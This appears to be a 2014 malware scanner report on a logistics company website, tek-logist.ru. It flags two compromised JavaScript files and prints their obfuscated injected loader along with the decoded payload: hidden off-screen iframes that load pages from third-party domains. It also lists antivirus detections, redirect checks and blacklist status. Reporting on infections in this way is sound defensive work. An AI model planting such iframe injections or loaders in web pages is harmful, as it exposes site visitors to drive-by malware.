New scan:

Malware Scanner report for tek-logist.ru

Malicious/Suspicious/Total urls checked
1/1/15
2 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://tek-logist.ru/
200 OK
Content-Length: 32009
Content-Type: text/html
clean
http://tek-logist.ru/media/system/js/caption.js
200 OK
Content-Length: 9241
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (q_haystack, q_needle, q_offset) {
var haystack = (q_haystack + '').toLowerCase();
var needle = (q_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, q_offset)) !== -1) {
return index;
}
return false;
}



function ope_check_data(){
var list_data = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant','Chromium','Fir
... 4119 bytes are skipped ...
r.appendChild(element);
if ( element.title != "" ) {
container.appendChild(text);
}
container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});

Decoded script:


<iframe src="http://slogan.industrialbackups.ca/jtrsjdgjdyttfhdfghhr13.html" Name="Motools" style="position:absolute;left:-1370px;top:-1370px;" height="130" width="130"></iframe><iframe src="http://swswnasel.miguelarevalo.es/ewtaeyeuy8.html" style="position:absolute;left:-1409px;top:-1409px;" height="170" width="170" name="Achtamar"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Microsoft
Trojan:JS/Iframe.DI

http://tek-logist.ru/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js
200 OK
Content-Length: 17002
Content-Type: application/x-javascript
clean
http://tek-logist.ru/modules/mod_swfobject/lib/swfobject.js
200 OK
Content-Length: 17540
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (q_haystack, q_needle, q_offset) {
var haystack = (q_haystack + '').toLowerCase();
var needle = (q_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, q_offset)) !== -1) {
return index;
}
return false;
}



function ope_check_data(){
var list_data = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome
...[3957 bytes skipped]...

Decoded script:


function f() {
if (J) {
return;
}
try {
var Z = j.getElementsByTagName("body")[0].appendChild(C("span"));
Z.parentNode.removeChild(Z);
} catch (aa) {
return;
}
J = true;
var X = U.length;
for (var Y = 0; Y < X; Y++) {
U[Y]();
}
}
<iframe src="http://slogan.industrialbackups.ca/jtrsjdgjdyttfhdfghhr13.html" Name="Motools" style="position:absolute;left:-1370px;top:-1370px;" height="130" width="130"></iframe><iframe src="http://swswnasel.miguelarevalo.es/ewtaeyeuy8.html" style="position:absolute;left:-1409px;top:-1409px;" height="170" width="170" name="Achtamar"></iframe>

http://tek-logist.ru/en
200 OK
Content-Length: 27767
Content-Type: text/html
clean
http://tek-logist.ru/en/railway-container-transport
200 OK
Content-Length: 26202
Content-Type: text/html
clean
http://tek-logist.ru/railway-container-transport
200 OK
Content-Length: 30331
Content-Type: text/html
clean
http://tek-logist.ru/sizes-of-containers-and-wagons
200 OK
Content-Length: 19839
Content-Type: text/html
clean
http://tek-logist.ru/en/sizes-of-containers-and-wagons
200 OK
Content-Length: 16051
Content-Type: text/html
clean
http://tek-logist.ru/en/delivery-of-cargoes-by-rail-in-container
404 Not Found
Content-Length: 1390
Content-Type: text/html
clean
http://tek-logist.ru/index.php
200 OK
Content-Length: 32018
Content-Type: text/html
clean
http://tek-logist.ru/freight-classification
200 OK
Content-Length: 21016
Content-Type: text/html
clean
http://tek-logist.ru/en/freight-classification
200 OK
Content-Length: 17225
Content-Type: text/html
clean
http://tek-logist.ru/en/international-transport
200 OK
Content-Length: 28951
Content-Type: text/html
clean
http://tek-logist.ru/international-transport
200 OK
Content-Length: 35195
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tek-logist.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 12 Aug 2014 12:42:51 GMT
Pragma: no-cache
Server: nginx/1.2.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 12 Aug 2014 12:41:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3463296a4e3bea92db749f6b58946db9=52070b3a8b5b28703eb64d7b80739b5b; path=/
X-Powered-By: PHP/5.3.13
Second query (visit from search engine):
GET / HTTP/1.1
Host: tek-logist.ru
Referer: http://www.google.com/search?q=tek-logist.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tek-logist.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tek-logist.ru/

Result: tek-logist.ru is not infected or malware details are not published yet.